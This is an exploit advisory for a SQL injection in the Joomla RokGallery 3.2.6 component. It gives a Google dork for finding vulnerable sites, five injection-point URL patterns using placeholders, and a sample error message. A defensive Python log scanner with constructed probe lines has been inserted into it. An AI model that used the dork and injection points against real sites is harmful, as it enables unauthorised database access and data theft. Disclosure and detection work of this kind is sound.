####################################################################
# Exploit Title : Joomla Rokin RokGallery Components 3.2.6 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 31/01/2019
# Vendor Homepage : rockettheme.com
# Software Download Link : rockettheme.com/joomla/extensions/rokgallery
# Software Information Link : extensions.joomla.org/extension/rokgallery/
# Software Version : 3.2.6
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_rokin''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019010299
packetstormsecurity.com/files/151434/Joomla-Rokin-RokGallery-3.2.6-SQL-Injection.html
####################################################################
# Description about Software :
***************************
RokGallery is a ground-up revolutionary gallery extension, developed to be hugely flexible, versatile and user friendly. The system itself is built on a custom tag-based architecture with the ability to have multiple tag-based galleries.
####################################################################
# Impact :
***********
The Joomla Rokin RokGallery 3.2.6 component is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?option=com_rokin&Itemid=[SQL Injection]
/index.php?option=com_rokin&unit=gallery&act=show&Itemid=[SQL Injection]
/index.php?option=com_rokin&Itemid=[ID-NUMBER]&unit=photo&act=show&albumid=[SQL Injection]
/index.php?option=com_rokin&Itemid=[ID-NUMBER]&unit=photo&act=show&albumid=[ID-NUMBER]&photoid=[SQL Injection]
/index.php?option=com_rokin&Itemid=[ID-NUMBER]&unit=album&act=show&albumid=[SQL Injection]
####################################################################
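A defender-side check built on the parameters the advisory names (Itemid, albumid, photoid are all expected to be integers), added here as an example and not part of the original advisory. The log lines are constructed, and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory names as injection points; legitimate values are integers.
NUMERIC_PARAMS = ("Itemid", "albumid", "photoid")

# Request field of an Apache combined-format access log line (format assumed).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url: str) -> dict:
    """Return {param: decoded value} for com_rokin parameters that are not plain integers."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if qs.get("option") != ["com_rokin"]:
        return {}  # not a RokGallery request
    hits = {}
    for name in NUMERIC_PARAMS:
        for value in qs.get(name, []):
            # An empty value is tolerated; anything else must be digits only.
            if value and not value.isdigit():
                hits[name] = value
    return hits

def scan_log(lines):
    """Yield (client_ip, request_url, hits) for each line with a suspicious com_rokin request."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group(1))
        if hits:
            yield line.split(" ", 1)[0], m.group(1), hits

# Constructed sample log lines (not real traffic): one benign RokGallery request,
# two probes using the advisory's quote payload, one unrelated component.
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_rokin&Itemid=165 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [31/Jan/2019:10:00:07 +0000] "GET /index.php?option=com_rokin&Itemid=2&unit=photo&act=show&albumid=23%27 HTTP/1.1" 500 812',
    '203.0.113.9 - - [31/Jan/2019:10:00:09 +0000] "GET /index.php?option=com_rokin&Itemid=63&unit=photo&act=show&albumid=9&photoid=1%27 HTTP/1.1" 500 812',
    '198.51.100.2 - - [31/Jan/2019:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=5%27 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, url, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {url} -> suspicious {hits}")
```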
# Example Vulnerable Sites :
*************************
####################################################################
# Example SQL Database Error :
****************************
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /home/transp15/public_html/web/libraries/joomla/filter/filterinput.php on line 512
Strict Standards: Non-static method JLoader::import() should not be called statically in /home/transp15/public_html/web/libraries/loader.php on line 186
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################